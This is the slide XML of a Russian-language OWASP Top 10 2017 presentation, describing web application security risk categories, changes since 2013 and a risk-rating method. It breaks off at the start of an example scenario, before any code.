                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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Объединенные или исключенные, но не забытые:</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A4-Небезопасные прямые ссылки на объекты </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7-Отсутствие контроля доступа на функциональном уровне </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>объединены в </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A5:2017-Недостатки контроля доступа</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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A8-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Межсайтовая подмена запросов (CSRF)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> была обнаружена только в 5% приложений, поскольку большинство </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>фреймворков</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> имеют </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>средства защиты от CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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A10-Непроверенные перенаправления и переадресации</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> были обнаружены примерно в 8% приложений, но данная категория была вытеснена Внешними сущностями XML (XXE).</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="66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335541606"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5455920"/>
          <a:ext cx="6858000" cy="3701286"/>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732">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 – Внедрение</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A1:2017-Внедрение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A2 – Недостатки аутентификации и управления сессиями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A2:2017-Недостатки аутентификации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A3 – Межсайтовое выполнение сценариев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A3:2017-Разглашение конфиденциальных данных</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A4 – Небезопасные прямые ссылки на объекты </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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A4:2017-Внешние сущности XML (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> [Новое]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A5 – Некорректная настройка параметров безопасности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A5:2017-Недостатки контроля доступа </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[Объединено]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 – Разглашение конфиденциальных данных</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A6:2017-Некорректная настройка параметров безопасности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A7</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dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>–</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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Отсутствие контроля доступа на функциональном уровне</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4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>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ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:2017-Межсайтовое выполнение сценариев</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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A8 – Межсайтовая подмена запросов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A8:2017-Небезопасная </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>десериализация</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> [Новое, Сообщество]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A9 – Использование компонентов с известными уязвимостями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A9:2017-Использование компонентов с известными уязвимостями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solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10 – Непроверенные перенаправления и переадресации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A10:2017-Недостатки </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>журналирования</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> и мониторинга</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83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[Новое, Сообщество]</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ЧН</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Что нового</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Elbow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2604361" y="7523892"/>
            <a:ext cx="1026984"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sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Что такое угрозы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Злоумышленники могут нанести ущерб вашему бизнесу или организации, используя ваше приложение. Подобные способы использования приложения представляют собой угрозы, которые могут (или не могут) быть достаточно серьезными, чтобы обращать на них внимание.</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Иногда эти способы легко найти и эксплуатировать, иногда — очень сложно. Аналогичная ситуация с возможным ущербом: его может не быть совсем или он может лишить вас бизнеса. Чтобы определить риски для вашей организации, оцените вероятности, связанные с источниками угроз, векторами атак и недостатками безопасности, а затем объедините их с оценкой технического и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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репутационного</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вреда для вашей организации. Сумма этих факторов определяет совокупный риск.</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Векторы</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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Недостатки</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="ru-RU" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ru-RU" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>безопасности</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Технические</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Функция</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Настройки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sz="2400" dirty="0"/>
              <a:t>Угрозы</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Угрозы безопасности приложений</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69" name="Table 177"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3811760620"/>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Что </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" u="sng">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>мне</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> грозит?</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sz="800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Главной задачей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4"/>
                        </a:rPr>
                        <a:t>Топ-10 OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> является определение наиболее серьезных угроз безопасности веб-приложений для широкого круга организаций. Для каждой из этих угроз дается общая информация о вероятности ее возникновения и возможных технических последствиях, полученная и использованием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5"/>
                        </a:rPr>
                        <a:t>Методики оценки рисков OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" dirty="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endPar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В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этом выпуске мы обновили систему оценки рисков для облегчения расчета вероятности возникновения и возможного ущерба для любой угрозы. Более подробную информацию можно узнать в разделе </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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Об угрозах</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sz="80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Нет одинаковых организаций, как нет одинаковых злоумышленников, целей и последствий атак. Если одна организация использует некую систему управления контентом (CMS) для публикации новостей, а система здравоохранения использует такую же систему для хранения медицинских данных, то угрозы и риски для этих организаций будут сильно отличаться. Очень важно определять риски для вашей организации, исходя из применимых к ней угроз и возможных последствий атак.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pP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Где это возможно, для унификации общепринятых наименований и снижения риска возникновения путаницы, названия угроз в Топ-10 соответствуют названиям уязвимостей из списка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CWE</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52265458"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="53700" y="5967155"/>
          <a:ext cx="4410415" cy="1428581"/>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53375">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="741425">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34015">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="340692">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Источники угроз</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="ru-RU" sz="6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эксплуатации</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6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Распространенность</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ru-RU"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уязвимости</a:t>
                      </a:r>
                      <a:endPar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обнаружения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Технические последствия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Последствия </a:t>
                      </a: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52048">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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="7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Очень</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="6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68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распространенная:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="7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i="0" u="none" strike="noStrike" baseline="0" dirty="0" smtClean="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ru-RU" sz="700" b="1" i="0" u="none" strike="noStrike"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Тяжелые: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90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бизнеса</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1197">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600" b="1">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Распространенная:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="6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Умеренные:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" b="1"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61197">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>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Редкая: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68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Незначительные</a:t>
                      </a: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p>
                    <a:p>
                      <a:pPr algn="ct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80" b="1" i="0" u="none" strike="noStrike" baseline="0"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ru-RU" sz="68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Ссылки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Методика оценки рисков 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Раздел о моделировании угроз/рисков</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Сторонние</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="8280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ISO 31000: Менеджмент рисков</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27001: Менеджмент информационной безопасности</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Фреймворк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кибербезопасности</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 NIST (US)</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Методы устранения последствий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кибератак</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 (AU)</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NIST CVSS 3.0</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Средства моделирования угроз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Microsoft</a:t>
                      </a:r>
                      <a:endPar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T10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0"/>
              <a:t>Топ-10 OWASP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0"/>
              <a:t>Угрозы безопасности приложений – 2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="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23387"/>
            <a:ext cx="5218177" cy="68196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например, с внедрением SQL,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NoSQL</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OS и LDAP, возникают, когда непроверенные данные отправляются интерпретатору в составе команды или запроса. Вредоносные данные могут заставить интерпретатор выполнить непредусмотренные команды или обратиться к данным без прохождения соответствующей авторизации.</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A1:2017-Внедрение</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Функции приложений, связанные с аутентификацией и управлением сессиями, часто некорректно реализуются, позволяя злоумышленникам скомпрометировать пароли, ключи или сессионные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токены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а также эксплуатировать другие ошибки реализации для временного или постоянного перехвата учетных записей пользователей.</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A2:2017-Недостатки аутентификации</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598411"/>
            <a:ext cx="5218177" cy="74544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Многие веб-приложения и API имеют плохую защиту критичных финансовых, медицинских или персональных данных. Злоумышленники могут похитить или изменить эти данные, а затем осуществить мошеннические действия с кредитными картами или персональными данными. Конфиденциальные данные требуют дополнительных мер защиты, например их шифрования при хранении или передаче, а также специальных мер предосторожности при работе с браузером.</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A3:2017-Разглашение конфиденциальных данных</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Старые или плохо настроенные XML-процессоры обрабатывают ссылки на внешние сущности внутри документов. Эти сущности могут быть использованы для доступа к внутренним файлам через обработчики URI файлов, общие папки, сканирование портов, удаленное выполнения кода и отказ в обслуживании.</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A4:2017-Внешние сущности XML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208842"/>
            <a:ext cx="5218177" cy="74097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Действия, разрешенные аутентифицированным пользователям, зачастую некорректно контролируются. Злоумышленники могут воспользоваться этими недостатками и получить несанкционированный доступ к учетным записям других пользователей или конфиденциальной информации, а также изменить пользовательские данные или права доступа.</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A5:2017-Недостатки контроля доступа</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02097"/>
            <a:ext cx="5218177" cy="75871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Некорректная настройка безопасности является распространенной ошибкой. Это происходит из-за использования стандартных параметров безопасности, неполной или специфичной настройки, открытого облачного хранения, некорректных HTTP-заголовков и подробных сообщений об ошибках, содержащих критичные данные. Все ОС,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библиотеки и приложения должны быть не только настроены должным образом, но и своевременно корректироваться и обновляться.</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789712"/>
            <a:ext cx="5218177" cy="86825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XSS имеет место, когда приложение добавляет непроверенные данные на новую веб-страницу без их соответствующей проверки или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>преобразования, </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или когда обновляет открытую страницу через API браузера, используя предоставленные пользователем данные, содержащие HTML- или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-код. С помощью XSS злоумышленники могут выполнять сценарии в браузере жертвы, позволяющие им перехватывать пользовательские сессии, подменять страницы сайта или перенаправлять пользователей на вредоносные сайты.</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A7:2017-Межсайтовое выполнение сценариев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Небезопасная десериализация часто приводит к удаленному выполнению кода. Ошибки десериализации, не приводящие к удаленному выполнению кода, могут быть использованы для атак с повторным воспроизведением, внедрением и повышением привилегий.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A8:2017-Небезопасная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endParaRPr lang="ru-RU"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505711" y="7460959"/>
            <a:ext cx="5218177" cy="6804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Компоненты, такие как библиотеки,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программные модули, запускаются с привилегиями приложения. Эксплуатация уязвимого компонента может привести к потере данных или перехвату контроля над сервером. Использование приложениями и API компонентов с известными уязвимостями может нарушить защиту приложения и привести к серьезным последствиям.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A9:2017-Использование компонентов с известными уязвимостями</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Freeform 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49216BAC-D272-467A-B5B1-631A0C551A99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1502002" y="8215093"/>
            <a:ext cx="5218177" cy="77179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а также отсутствие или неэффективное использование системы реагирования на инциденты, позволяет злоумышленникам развить атаку, скрыть свое присутствие и проникнуть в другие системы, а также изменить, извлечь или уничтожить данные. Проникновение в систему обычно обнаруживают только через 200 дней и, как правило, сторонние исследователи, а не в рамках внутренних проверок или мониторинга.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A10:2017-Недостатки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 и мониторинга</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92497"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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A6:2017-Некорректная настройка параметров безопасности</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1"/>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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Сценарий №1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Приложение использует </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>недоверенные</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> данные при создании следующего </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>уязвимого</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
